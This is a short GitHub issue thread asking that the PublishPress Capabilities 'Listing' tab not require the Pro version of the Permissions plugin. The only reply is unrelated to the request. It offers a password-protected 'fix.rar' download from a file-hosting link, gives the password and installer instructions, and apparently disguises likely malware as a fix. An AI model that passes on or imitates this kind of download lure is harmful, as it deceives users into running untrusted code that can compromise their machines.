### ISSUE TITLE
Capabilities screen: "Listing" tab should not require Pro version of Permissions

### ISSUE THREAD

**Issue by agapetry** [publishpress/PublishPress-Capabilities#1158]
The "Listing" tab on the Capabilities screen should be displayed if any version of the Permissions plugin (free or Pro) is active. The only other requirement should be that the Collaborative Publishing module is enabled (Permissions > Settings > Modules).

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
